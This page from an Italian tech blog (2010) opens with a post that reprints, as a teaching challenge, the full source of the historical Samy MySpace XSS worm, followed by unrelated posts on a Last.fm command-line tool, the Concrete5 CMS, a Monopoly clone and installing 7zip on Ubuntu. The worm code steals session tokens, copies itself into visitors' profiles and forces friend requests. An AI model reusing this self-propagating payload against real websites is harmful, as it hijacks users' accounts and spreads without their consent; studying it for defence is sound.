Nicola Moretti - Hanicker IT Blog

Myspace old XSS virus

A volte anche un vecchio worm js può risultare utile a livello didattico, anche per capire come sia difficile limitare i danni di eventuali falle XSS.

La sfida è semplice, ecco il codice:

<div id=mycode style="BACKGROUND: url('java<br /> script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td> <p>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

Il codice permetteva di guadagnare velocemente amici su MySpace, tanto da meritarsi una pagina su wikipedia.

Se avete problemi nell’analisi, ecco il link di riferimento per l’analisi. Qui, invece, è disponibile la storia di questo bug.

2010: 08/13
CATEGORY: Hacks
Sicurezza
TAGS: bug
myspace
worm
xss
Write comment

Ottenere liste di stream Last.fm da linea di comando

Oggi propongo un codice molto semplice che permette di ottenere liste di stream da Last.fm come output.

A cosa potrebbe servire? Beh, vi potete sbizzarrire. L’output è studiato per poter essere facilmente parsato da altri programmi (grep e simili). Inoltre modificando leggermente il programma potrete anche ottenere l’url del file mp3 (provate a vedere l’xml completo).

Il funzionamento è semplice:

dando il comando

java Last hanicker “MIAPASSWORD” “lastfm://user/hanicker/personal” 100

ad esempio otterrò all’incirca un centinaio di canzoni che Last.fm ha nella mia libreria personale, ad esempio:

“344374428″,”Naturally”,”Selena Gomez & The Scene”
“2747624″,”Sorted For E’s & Wizz”,”Pulp”
“76053403″,”Svanire”,”Ludovico Einaudi”
“2722039″,”Salvation”,”The Cranberries”
“236136997″,”Talented”,”Dirty Disco Youth”

dove troviamo ID, artista e titolo.
Read more

2010: 07/30
CATEGORY: Musica
Programming
Tools
TAGS: download
last.fm
lastfm
linea di comando
scaricare
Write comment

Concrete5 – il cms e la community italiana

Un content management system, in acronimo CMS, letteralmente “sistema di gestione dei contenuti”, è uno strumento software installato su un server web studiato per facilitare la gestione dei contenuti di siti web, svincolando l’amministratore da conoscenze tecniche di programmazione Web.

Oggi è stato aperto il sito ufficiale della community italiana per il cms concrete5. Come ogni community nascente, concrete5 Italia ha bisogno del massimo aiuto in pubblicità e contributi per ingrandirsi e migliorare.

La trovate all’indirizzo www.concrete5.it.

concrete5

Esistono centinaia di CMS. Chi lavora nel web development sà bene che non esiste un’applicazione migliore di un’altra. Semplicemente una può essere più o meno adatta a quello che si vuole fare.

Iniziamo col descrivere questa piattaforma.

2010: 07/23
CATEGORY: Informatica
Tools
Web development
TAGS: cms
concrete5
3 comments

Kapitalist – Monopoly per Linux

Kapitalist è un’ottima versione gratuita del classico Monopoly giocabile anche in rete (privata o meno).

E’ rilasciato sotto licenza GPL e sarebbe molto interessante effettuare il porting anche per altri prodotti (ad esempio Android).

E’ possibile giocare in rete e addirittura usando una riga di comando al posto dell’interfaccia grafica.
Si possono anche effettuare partite contro il pc (da 1 a 3 AI).

Per scaricarlo:
http://kapitalist.sourceforge.net

2010: 07/08
CATEGORY: Giochi
TAGS: gioco
linux
ubuntu
2 comments

Installare 7zip su Ubuntu

Il nome del pacchetto per 7zip è

p7zip.

Quindi

sudo apt-get install p7zip

fa il suo lavoro.

2010: 07/03
CATEGORY: Cazzatine
TAGS: 7zip
package
ubuntu
Write comment

Tecnologia e Digital Hacks

Myspace old XSS virus

Ottenere liste di stream Last.fm da linea di comando

Concrete5 – il cms e la community italiana

concrete5

Kapitalist – Monopoly per Linux

Installare 7zip su Ubuntu

Articoli più letti

Libri letti

Pubblicità

Articoli casuali

Articoli recenti

Categorie

Informazioni legali

Wikio

Development

Siti di amici

Tecnologia e Digital Hacks

Myspace old XSS virus

Ottenere liste di stream Last.fm da linea di comando

Concrete5 – il cms e la community italiana

concrete5

Kapitalist – Monopoly per Linux

Installare 7zip su Ubuntu

Articoli più letti

Libri letti

Pubblicità

Articoli casuali

Articoli recenti

Tag

Categorie

Informazioni legali

Wikio

Development

Siti di amici